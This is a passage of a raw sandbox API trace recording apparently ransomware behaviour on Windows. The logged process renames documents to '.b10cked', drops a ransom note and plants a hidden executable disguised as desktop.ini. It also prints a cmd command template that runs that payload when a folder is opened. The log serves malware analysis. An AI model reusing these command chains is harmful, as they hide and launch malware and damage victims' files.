lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa40e [0229.697] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xa40b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xa40b, lpOverlapped=0x0) returned 1 [0229.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iyDSdIsdd3hcv.pptx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0229.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iyDSdIsdd3hcv.pptx", cchWideChar=18, lpMultiByteStr=0x13286a4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iyDSdIsdd3hcv.pptx", lpUsedDefaultChar=0x0) returned 18 [0229.704] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14819 [0229.704] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0229.705] CloseHandle (hObject=0x1b4) returned 1 [0229.706] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\iyDSdIsdd3hcv.pptx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT") returned 0x51 [0229.708] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\") returned 0x45 [0229.709] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9d8, dwThreadId=0x7d0)) returned 1 [0229.832] CloseHandle (hObject=0x120) returned 1 [0229.832] CloseHandle (hObject=0x1b4) returned 1 [0229.832] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\", cchLength=0x6c | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\RIBQ701A98461 Y-C _\\") returned 0x6c [0229.832] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0229.832] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\RIBQ701A98461 Y-C _\\", cchCount1=108, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount2=88) returned 3 [0229.832] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\", cchLength=0x6c | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\RIBQ701A98461 Y-C _\\") returned 0x6c [0229.832] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.832] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\RIBQ701A98461 Y-C _\\", cchCount1=108, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0229.832] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0229.833] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0229.833] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0229.833] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\") returned 0x45 [0229.833] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0229.834] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0229.834] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xfcc, dwThreadId=0x9f0)) returned 1 [0229.839] CloseHandle (hObject=0x120) returned 1 [0229.839] CloseHandle (hObject=0x1b4) returned 1 [0229.839] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\ribq701a98461 y-c _\\bl0cked-readme.rtf")) returned 0xffffffff [0229.839] GetLastError () returned 0x2 [0229.839] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\ribq701a98461 y-c _\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0229.842] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\ribq701a98461 y-c _\\bl0cked-readme.rtf")) returned 0x20 [0229.842] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0229.842] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0229.842] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0229.842] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0229.842] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0229.843] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0229.843] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0229.843] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\") returned 0x45 [0229.843] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0229.843] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0229.844] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1") returned 0x44 [0229.844] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x1ce | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x1ce [0229.844] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0229.844] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9bc, dwThreadId=0x9ac)) returned 1 [0229.859] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0233.410] CloseHandle (hObject=0x1b4) returned 1 [0233.410] CloseHandle (hObject=0x120) returned 1 [0233.410] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.410] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0233.410] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0233.410] GetTickCount () returned 0x402dd [0233.410] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=29019940287) returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x33\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x44\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x34\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x43\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6f\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x42\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x68\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x66\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.410] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0233.410] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0233.410] CharUpperBuffW (in: lpsz="explorer.exe \"RIbq701A98461 y-C _\" & type \"RIbq701A98461 y-C _\\[HID_NAME]\" > 